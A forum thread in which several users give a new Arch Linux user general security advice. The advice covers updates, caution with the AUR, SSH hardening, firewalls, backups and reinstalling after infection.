I’m not a security expert by any means, but here are a few things I know as a regular user:

Always keep your system up-to-date and only download and execute software from the official Arch repository if you can help it. Malware often takes advantage of outdated systems that don’t have the latest security patches, so by staying as up-to-date as possible you’re making yourself a very difficult target. The AUR is a user-based repository and is not inherently trusted/maintained like the official Arch repos, so be careful and always read PKGBUILDs before you use AUR software. Don’t use AUR auto-updaters unless you’re reading the PKGBUILD changes every time. Ideally try not to use the AUR at all if you can help it; official Arch Linux is usually quite stable, but AUR software is often responsible for a lot of the “breakages” people tend to get with Arch. If you have to run sketchy software, use a virtual machine for it, as a 0-day VM escape is almost certainly not going to happen with any sort of malware you’d run into. ClamAV or VirusTotal may also help you scan specific files that you’re wary of, but I wouldn’t trust that a file is clean just because it passes an AV check. Also, never run anything as root unless you have a very specific reason, and even then try to use sudo instead of elevating to a full root shell.

Don’t open up any network ports on your system unless you absolutely have to, and if you’re opening an SSH port, make sure that it: isn’t the default port number, requires a keyfile for login, root cannot be logged into directly, and authentication attempts are limited to a low number. If you’re opening ports for other services, try to use Docker/Podman containers with minimal access to your system resources and not running in root mode. Also consider using something like CrowdSec or fail2ban for blocking bots crawling ports.

As far as finding out if you’re infected, I’m not sure if there’s a great way to know unless they immediately encrypt all your stuff and demand crypto. Malware could also come in the form of silent keyloggers (which you’d only find out about after you start getting your accounts hacked) or cryptocurrency miners/botnets (which probably attempt to hide their CPU/GPU usage while you’re actively using your computer). At the very least, you’re not likely to be hit by a sophisticated 0-day, so whatever malware you get on your computer probably wants something direct and uncomplicated from you.

Setting up a backup solution to a NAS running e.g. ZFS can help with preventing malware from pwning your important data, as a filesystem like ZFS can rollback its snapshots and just unencrypt the data again (even if it’s encrypted directly on the NAS). 2FA’ing your accounts (especially important ones like email) is a good way to prevent keyloggers from being able to repeat your username+password into a service and get access. Setting up a resource monitoring daemon can probably help you find out if you’re leaking resources to some kind of crypto miner, though I don’t have specific recommendations as I haven’t done this before.

In the case of what to do once you’re pwned, IMO the only real solution is to salvage and verify your data, wipe everything down, and reinstall. There’s no guarantee that the malware isn’t continually hiding itself somewhere, so trying to remove it yourself is probably not going to solve anything. If you follow all the above precautions and still get pwned, I’m fairly sure the malware will be news somewhere, and security experts may already be studying the malware’s behavior and giving tips on what to do as a resolution.

Welcome to Linux.

Concerning your questions:

How to keep your system clean?

• Subscribe to the security mailing list/blog etc. of your Linux distribution and for software that you use
• Update your system whenever there are updates available and reboot your system after applying the updates
• Activate the firewall of your system and block all incoming traffic which was not initiated by your own system
• Only install software which is distributed with your operating system or which is well known and you download from the official distribution page (for the sake of an example: If you use Google Chrome download the package/binary for your Linux from Googles Chrome page)
• Use an adblocker for your browser like ublock origin

What not to do:

• Never install software found on the internet or a forum
• Never run arbitrary script from the internet in your shell

Doing the above and applying some common sense should be fairly secure. As a rule of thump: Less software is always better and well known software will usually be better scrutinized and more secure. (YMMV)

As a normal desktop user your chances of getting your system infected when applying above rules are very low and they are your best line of defense.

Securing a Linux system, especially in depth, fills books, and detecting an infection is another topic for specialists. One way to improve your chances of having a non infected system is using an immutable Linux distribution like Fedora Silverblue, which should in theory be more resistant to infections and which should in theory allow to detect infections easily.

Unless you have a reason to expect being personally targeted (in which case: good luck to you ;-)), the answer to infections and similar is having regular full backups of all your data, so in case of an infection you can wipe your computer and recover everything. You should have regular full backups anyway, in case your SSD fails, your computer gets stolen and similar threats to your data.

Welcome aboard!

Never got a virus or at least I don’t know about it 😅 But always install packages from official repositories or AUR (but I usually inspect PKGBUILDS for unpopular stuff).